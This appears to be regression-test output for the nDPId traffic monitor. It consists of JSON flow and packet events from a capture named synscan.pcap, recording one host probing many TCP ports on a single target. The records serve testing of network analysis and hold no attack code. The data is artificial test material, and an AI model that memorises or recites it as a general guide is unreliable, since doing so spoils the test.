-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1040,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsdCsAADsGmUesEAAIQA2GNIzSB\/PdUoMYAAAAAGACEAAgnAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsb8MAADgGoK+sEAAIQA2GNIzSAJDdUoMYAAAAAGACBAAz\/wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1042,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsXXkAADcGs\/msEAAIQA2GNIzSBFjdUoMYAAAAAGACEAAkNwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1043,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsZeIAADsGp5CsEAAIQA2GNIzSCHrdUoMYAAAAAGACEAAgFQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1044,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsVbcAADIGwLusEAAIQA2GNIzSF9XdUoMYAAAAAGACDAAUugAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsFoAAADQG\/fKsEAAIQA2GNIzSAyDdUoMYAAAAAGACBAAxbwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsLm4AADIG6ASsEAAIQA2GNIzSIyLdUoMYAAAAAGACDAAJbQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsZG4AADUGrwSsEAAIQA2GNIzSCV\/dUoMYAAAAAGACCAAnMAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsqyIAACsGclCsEAAIQA2GNIzSDfzdUoMYAAAAAGACEAAakwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsXvEAADYGs4GsEAAIQA2GNIzSAFndUoMYAAAAAGACDAAsNgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsT3AAACcG0gKsEAAIQA2GNIzSIqndUoMYAAAAAGACEAAF5gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsjsMAADcGgq+sEAAIQA2GNIzSG8LdUoMYAAAAAGACEAAMzQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAs+kwAACcGJyasEAAIQA2GNIzSH5fdUoMYAAAAAGACEAAI+AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAs9w4AADIGH2SsEAAIQA2GNIzSJXrdUoMYAAAAAGACDAAHFQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1054,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsYMkAADoGramsEAAIQA2GNIzSBEvdUoMYAAAAAGACDAAoRAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1055,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAseVsAACcGqBesEAAIQA2GNIzShw3dUoMYAAAAAGACEAChgQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsAugAACkGHIusEAAIQA2GNIzSE6bdUoMYAAAAAGACCAAc6QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1057,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsY\/8AADoGqnOsEAAIQA2GNIzSCo7dUoMYAAAAAGACDAAiAQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsrsYAAC4Ga6ysEAAIQA2GNIzTgA\/dU4MZAAAAAGACDACsfAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsvEIAADEGWzCsEAAIQA2GNIzTBaPdU4MZAAAAAGACCAAq6QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1060,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAs7Q8AAC0GLmOsEAAIQA2GNIzTTVndU4MZAAAAAGACCADjMgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsVA8AACgGzGOsEAAIQA2GNIzTFqrdU4MZAAAAAGACBAAd4gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1062,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsbTMAADEGqj+sEAAIQA2GNIzTI3ndU4MZAAAAAGACCAANEwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1063,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAspFIAADsGaSCsEAAIQA2GNIzTBHHdU4MZAAAAAGACEAAkGwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1064,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1064,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsG4AAACwGAPOsEAAIQA2GNIzTB2zdU4MZAAAAAGACBAAtIAAAAgQFtA=="} 